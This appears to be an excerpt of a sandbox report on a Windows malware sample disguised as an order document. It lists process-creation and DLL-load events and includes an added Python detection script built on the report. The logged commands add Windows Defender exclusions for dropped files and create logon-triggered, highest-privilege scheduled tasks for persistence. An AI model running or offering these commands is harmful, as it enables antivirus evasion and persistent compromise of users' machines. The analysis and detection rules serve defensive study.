Source: unknown | Process created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Process created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp"
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Process created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
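The process-creation rows above are what the report's "Adds a directory exclusion to Windows Defender", "Scheduled temp file as task from temp location" and "Uses schtasks.exe or at.exe" signatures key on: a parent running from the user's Desktop or %APPDATA% spawns powershell.exe with Add-MpPreference -ExclusionPath for its own dropped files, imports a task definition from a file in %LOCALAPPDATA%\Temp, and registers an ONLOGON task with /rl HIGHEST whose action lives under %APPDATA%. The Python below is an added example, not part of the Joe Sandbox report or its detection engine: it re-implements those three checks as process-creation rules and runs them over event records constructed from the command lines listed above plus one benign control. The (parent image, child image, command line) record layout and the rule names are assumptions, not a specific EDR or Sigma schema.

```python
"""Process-creation rules for the behaviour chain listed in the report above.

Added example; not part of the Joe Sandbox report. The event tuples are
constructed from the report's "Process created" rows plus one benign control,
and the (parent, image, cmdline) layout is an assumed generic schema.
"""
import re
import shlex
from dataclasses import dataclass
from typing import Optional

# Locations a standard user can write to; every file the sample drops lives here.
USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)

# Constructed sample: (parent image, child image, child command line).
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe",
     r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
     r'-ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"'),
    (r"C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe",
     r"C:\Windows\SysWOW64\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" '
     r'/XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"'),
    (r"C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe",
     r"C:\Windows\SysWOW64\schtasks.exe",
     r'"schtasks" /create /tn "Outlooks" /sc ONLOGON '
     r'/tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f'),
    # Benign control (constructed): an admin shell excluding a vendor directory.
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Vendor\"'),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    detail: str


def _tokens(cmdline: str) -> list:
    """Split a Windows command line on whitespace, honouring double quotes.

    posix=False keeps backslashes literal, which Windows paths need; the
    surrounding quotes are then stripped from each token.
    """
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def _value_after(tokens: list, switch: str) -> Optional[str]:
    """Value following a case-insensitive switch such as /TN or -ExclusionPath."""
    low = [t.lower() for t in tokens]
    if switch.lower() not in low:
        return None
    i = low.index(switch.lower())
    return tokens[i + 1] if i + 1 < len(tokens) else None


def check_event(parent: str, image: str, cmdline: str) -> list:
    findings = []
    tokens = _tokens(cmdline)
    low = [t.lower() for t in tokens]
    image = image.lower()
    parent_in_user_path = bool(USER_WRITABLE.match(parent))

    # Rule 1: Defender exclusion for a user-writable path, or requested by a
    # parent that itself runs from one (the report's Add-MpPreference rows).
    if image.endswith("powershell.exe") and "add-mppreference" in low:
        path = _value_after(tokens, "-ExclusionPath")
        if path and (USER_WRITABLE.match(path) or parent_in_user_path):
            findings.append(Finding("defender_exclusion_user_path", parent, path))

    if image.endswith("schtasks.exe") and "/create" in low:
        # Rule 2: task definition imported from a file in the user's Temp dir.
        xml = _value_after(tokens, "/XML")
        if xml and TEMP_DIR.search(xml):
            findings.append(Finding("schtask_from_temp_xml", parent, xml))
        # Rule 3: task action under a user-writable path; record trigger and
        # run level, which in the report are ONLOGON and HIGHEST.
        action = _value_after(tokens, "/TR")
        if action and USER_WRITABLE.match(action):
            detail = "%s (sc=%s rl=%s)" % (
                action, _value_after(tokens, "/SC"), _value_after(tokens, "/RL"))
            findings.append(Finding("schtask_user_path_action", parent, detail))
    return findings


def scan(events) -> list:
    """Run every rule over an iterable of (parent, image, cmdline) records."""
    return [f for ev in events for f in check_event(*ev)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:28} parent={f.parent}\n{'':29}{f.detail}")
```

Run against the constructed records, the three malicious rows each produce one finding and the benign control produces none; the parent path is carried in every finding because a LOLBin launched from a user-writable directory is the common thread across all three behaviours.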
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Section loaded: sspicli.dll
